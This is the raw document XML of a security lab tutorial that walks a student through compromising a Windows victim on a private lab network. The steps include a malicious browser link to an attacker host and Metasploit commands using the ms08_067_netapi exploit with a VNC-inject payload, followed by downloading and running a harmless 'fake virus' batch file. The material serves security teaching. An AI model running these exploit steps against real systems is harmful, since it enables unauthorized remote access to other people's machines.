          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2EB60F69" wp14:editId="67F11ED9">
            <wp:extent cx="5943207" cy="411734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376" cy="4122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90C11" w14:textId="77777777" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="075F0CF5" w14:textId="4BDAD9F5" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A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4.WindowsVulerable01 Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6480D743" w14:textId="77777777" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A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color w:val="FB0007"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Instructions</w:t>
      </w:r>
      <w:r w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B521E7C" w14:textId="3DCF1163" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A">
      <w:pPr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Login as administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4682B3BB" w14:textId="2B58D495" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A54071A" wp14:editId="2525B809">
            <wp:extent cx="5943419" cy="388874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601" cy="3898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0E327" w14:textId="77777777" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29211075" w14:textId="1781592B" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A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D7332F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Section 6. Start Up a Web Browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215031D7" w14:textId="30E55C96" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A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1.Start Up Internet Explorer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C94BFA1" w14:textId="77777777" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A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color w:val="FB0007"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Instructions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118831A6" w14:textId="77777777" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A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Start --&gt; All Programs --&gt; Internet Explorer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245728C5" w14:textId="77777777" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="454A4E80" w14:textId="6C2F2878" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E0D67EE" wp14:editId="7C51CDF3">
            <wp:extent cx="5943279" cy="457454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450" cy="458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56CC5" w14:textId="1C1AC325" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B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2.Victim Clicks on Link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655AA1FF" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5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color w:val="FB0007"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Instructions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6105AB12" w14:textId="77777777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Place the Malicious Web Link in the Address Bar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3180BFE9" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1660"/>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="2160" w:hanging="216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In my case, http://192.168.1.105:8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334F167A" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1660"/>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="2160" w:hanging="216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In your case, get the IP address from Section 4, Step 8.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1E0F13" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5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color w:val="FB0007"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66760669" w14:textId="2835340E" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr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The Web Browser will just crash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BD35E9" w14:textId="786F7F4A" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14F907C6" wp14:editId="06F50359">
            <wp:extent cx="5943548" cy="4460240"/>
            <wp:effectExtent l="0" t="0" r="635" b="10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626" cy="447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2C04C" w14:textId="6ABB38A6" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5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D7332F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Section 7. Entering the Victim's Machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2637BA" w14:textId="612F7C80" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B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1.Record Victim's IP Address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E34C38C" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5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color w:val="FB0007"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Instructions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093E97C5" w14:textId="77777777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Record the Victim's IP Address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4151261A" w14:textId="77777777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Look for the line that starts with Session ID 1 (See Below).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C81828" w14:textId="462ACF30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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5EE0D8AE" wp14:editId="081728E7">
            <wp:extent cx="5943430" cy="457454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839" cy="4582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4F4D0" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B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Create VNC Session to Victim's machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA098B0" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5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color w:val="FB0007"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Instructions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0EA2ED" w14:textId="77777777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Press &lt;Enter&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128D5C34" w14:textId="77777777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use windows/smb/ms08_067_netapi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54170557" w14:textId="77777777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set PAYLOAD windows/vncinject/bind_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1234BB44" w14:textId="77777777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set RHOST 192.168.1.109</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C00DF52" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1660"/>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="2160" w:hanging="216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color w:val="FB0007"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
      <w:r w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>: This is the IP Address obtained in the previous step.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B791EA9" w14:textId="40808308" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr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Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C445448" w14:textId="4A87DE0D" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C181FBA" wp14:editId="09CCE9AB">
            <wp:extent cx="5943395" cy="457454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791" cy="4583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BE7A8" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B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Viewing the Victim's Machine over VNC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F31191" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5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color w:val="FB0007"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Instructions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF5B320" w14:textId="77777777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Now you have a VNC connection to the Victim's Machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE5CF74" w14:textId="77777777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Pretty KooL right!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E548681" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5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sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Proof of Lab Instructions #1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB8FC52" w14:textId="77777777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Click in the Metasploit Courtesy Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B4C07D" w14:textId="77777777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date, press enter twice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B49480F" w14:textId="77777777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echo "Your Name"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255E60AF" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1660"/>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="2160" w:hanging="216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Replace the string "Your Name" with your actual name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AFEF5E" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1660"/>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="2160" w:hanging="216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i.e., echo "John Gray"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687EC229" w14:textId="77777777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PrtScn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EB9701" w14:textId="77777777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Paste into a word document</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260CE1B9" w14:textId="77777777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Continue to Next Step</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA54028" w14:textId="6C01026D" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D7C0931" wp14:editId="6D2DA280">
            <wp:extent cx="5943314" cy="4688840"/>
            <wp:effectExtent l="0" t="0" r="635" b="101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788" cy="469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3D694" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B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Bring Up Internet Explorer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CBAE61" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5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color w:val="FB0007"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Instructions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD8ADE6" w14:textId="1BED8513" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr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Start --&gt; Internet Explorer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0216E879" w14:textId="4099AAD2" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28A4CB82" wp14:editId="6380413B">
            <wp:extent cx="5943509" cy="4688840"/>
            <wp:effectExtent l="0" t="0" r="635" b="101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856" cy="4696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0D420" w14:textId="3A95A1C0" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B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color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>5.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Download Fake Virus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F6B77A" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5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color w:val="FB0007"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Instructions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E993B8" w14:textId="77777777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Place the following link into the address bar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D4CFDC" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1660"/>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="2160" w:hanging="216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26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>http://www.computersecuritystudent.com/UNIX/BACKTRACK/BACKTRACK5R1/lesson6/fake_virus.bat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473718D7" w14:textId="77777777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Press Enter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C0DBDB" w14:textId="77777777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Click Save</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707AEF36" w14:textId="2CBF1BAE" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr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Continue to Next Step</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196B1DCA" w14:textId="38DEBA03" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5CD4C5CB" wp14:editId="0A762E51">
            <wp:extent cx="5943548" cy="5603240"/>
            <wp:effectExtent l="0" t="0" r="635" b="101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768" cy="5610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0E8BA" w14:textId="396D99C6" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B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color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>6.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Save the Fake Virus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCD1019" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5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color w:val="FB0007"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Instructions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEF5179" w14:textId="77777777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Navigate to "C:\tools\Virus Jar"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E153FE3" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1660"/>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="2160" w:hanging="216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Create this directory if it does not already exist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F68E4E0" w14:textId="6040B264" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr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Click Save</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB116F3" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70CA2FD5" w14:textId="5C8CE32B" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FCB4474" wp14:editId="380CF73C">
            <wp:extent cx="5943430" cy="5603240"/>
            <wp:effectExtent l="0" t="0" r="635" b="101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645" cy="560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5E0DC" w14:textId="765DAD64" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B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7.Run the Fake Virus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E30064D" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5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color w:val="FB0007"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Instructions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06534B36" w14:textId="736EA285" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr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Click the Run Button</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D1D6E2" w14:textId="77E80DDA" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BD4CBCC" wp14:editId="716A3504">
            <wp:extent cx="5943314" cy="5374640"/>
            <wp:effectExtent l="0" t="0" r="635" b="1016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127" cy="538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0EB17" w14:textId="0456295D" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B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8. Viewing Results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD7C593" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5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color w:val="FB0007"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Instructions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C34150" w14:textId="77777777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You will now see some messages stating your system was compromised.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AD7AA5" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1660"/>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="2160" w:hanging="216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Note, this is just a batch script that prints messages to a screen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E46EAF4" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1660"/>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="2160" w:hanging="216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This was just an example of what an attacker could do once they compromised the victim's machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F12D5D3" w14:textId="21B05268" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr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Click on the Black Box and Press Enter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787D967F" w14:textId="20A7576D" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28F1C370" wp14:editId="50E52560">
            <wp:extent cx="5943544" cy="5260340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458" cy="528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E3555" w14:textId="5FC9030B" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B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9. Delete the fake_virus.bat file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B0EA99" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5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color w:val="FB0007"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Instructions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E24DF00" w14:textId="77777777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Start --&gt; My Computer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578BE0A9" w14:textId="77777777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Navigate to "C:\tools\Virus Jar"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C368F2F" w14:textId="77777777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Right Click on fake_virus.bat</w:t>
      </w:r>
    </w:p>
